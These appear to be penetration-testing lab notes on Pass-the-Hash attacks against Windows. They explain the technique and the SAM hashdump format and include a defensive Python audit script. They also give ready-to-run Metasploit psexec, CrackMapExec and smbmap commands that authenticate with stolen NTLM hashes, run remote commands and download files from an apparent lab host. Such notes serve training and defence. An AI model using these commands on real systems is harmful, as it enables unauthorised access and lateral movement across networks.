Pass-the-Hash Attack
Pass-the-Hash (PtH) attacks allow an attacker to authenticate to a target system using stolen NTLM hashes without cracking them. Instead of recovering the plaintext password from the hash, the attacker presents the hash itself to the NTLM authentication exchange, impersonating the legitimate user and gaining access to the system.
Once an attacker has retrieved NTLM hashes, they can proceed without cracking them by utilizing tools designed for PtH attacks, such as:
Metasploit PsExec Module: This module allows attackers to execute commands on a remote system using NTLM hashes to authenticate.
Crackmapexec: A versatile tool that can perform lateral movement by leveraging NTLM hashes for authentication and access across the network.
PtH attacks exploit legitimate credentials, allowing access to systems without relying on service vulnerabilities. Even if the target services are patched or firewall rules restrict access, this technique bypasses those defenses by leveraging harvested credentials to authenticate and gain access.
The format for a hashdump on Windows is typically organized as follows:
USER : SID : LM-Hash : NTLM/NT-Hash
This format is commonly seen when extracting password hashes from the Security Account Manager (SAM) database in Windows.
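The following parser and audit routine is an added example and not part of the original notes. It parses lines in the USER:RID:LM-Hash:NT-Hash format shown above and flags what a defender reviewing a SAM dump wants to know: accounts with a blank password, accounts that still store a legacy LM hash, and accounts sharing the same NT hash (a shared password is exactly what makes lateral movement by PtH cheap). The sample dump, the account names and the non-constant hash values are constructed placeholders; only the empty-string LM/NT constants are real, well-known values.

```python
import re

# Well-known hashes of the empty string (public constants, not secrets).
EMPTY_LM = "aad3b435b51404eeaad3b435b51404ee"  # LM "no hash stored" marker
EMPTY_NT = "31d6cfe0d16ae931b73c59d7e0c089c0"  # NT hash of a blank password
HEX32 = re.compile(r"^[0-9a-fA-F]{32}$")

def parse_hashdump(text):
    """Parse USER:RID:LM:NT[:::] lines into dicts, skipping malformed lines."""
    records = []
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        parts = line.split(":")
        if len(parts) < 4:
            continue  # not enough fields for the pwdump layout
        user, rid, lm, nt = parts[0], parts[1], parts[2].lower(), parts[3].lower()
        if not (rid.isdigit() and HEX32.match(lm) and HEX32.match(nt)):
            continue  # field lengths/types do not match the format
        records.append({"user": user, "rid": int(rid), "lm": lm, "nt": nt})
    return records

def audit(records):
    """Return (account, finding) pairs a defender should follow up on."""
    findings = []
    by_nt = {}
    for r in records:
        if r["nt"] == EMPTY_NT:
            findings.append((r["user"], "blank password"))
        if r["lm"] != EMPTY_LM:
            findings.append((r["user"], "LM hash stored (weak legacy hash)"))
        by_nt.setdefault(r["nt"], []).append(r["user"])
    for nt, users in by_nt.items():
        if nt != EMPTY_NT and len(users) > 1:
            findings.append((",".join(users), "same NT hash (shared password)"))
    return findings

# Constructed sample dump: names and non-constant hash values are placeholders.
SAMPLE = """\
Administrator:500:aad3b435b51404eeaad3b435b51404ee:00112233445566778899aabbccddeeff:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
svc_backup:1001:aad3b435b51404eeaad3b435b51404ee:00112233445566778899aabbccddeeff:::
legacy:1002:0123456789abcdef0123456789abcdef:ffeeddccbbaa99887766554433221100:::
broken line without enough fields
"""

if __name__ == "__main__":
    for who, what in audit(parse_hashdump(SAMPLE)):
        print(f"{who}: {what}")
```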
w/ MSF
# After you get the hash
use exploit/windows/smb/psexec
show options
set LPORT [PORT]
set RHOSTS [Target-IP]
set SMBUser admin
set SMBPass [LM-Hash:NTLM/NT-Hash]
set target Native\ upload
exploit
w/ Crackmapexec
crackmapexec smb [IP] -u USERNAME -H "NTLM-HASH"
crackmapexec smb [IP] -u USERNAME -H "NTLM-HASH" -x 'ipconfig'
Important Notes
# After you get the hash
use exploit/windows/smb/psexec
show options
set LPORT [PORT]
set RHOSTS [Target-IP]
set SMBUser admin
set PASS_FILE [LM-Hash:NTLM/NT-Hash List]
set target Native\ upload
exploit
# download resource with NTLM Hash
smbmap -u nancy -p aad3b435b51404eeaad3b435b51404ee:b3ddea4b4b957f3e037af75cfe5317ad -H target.ine.local -r ITResources --download ./ITResources/hint.txt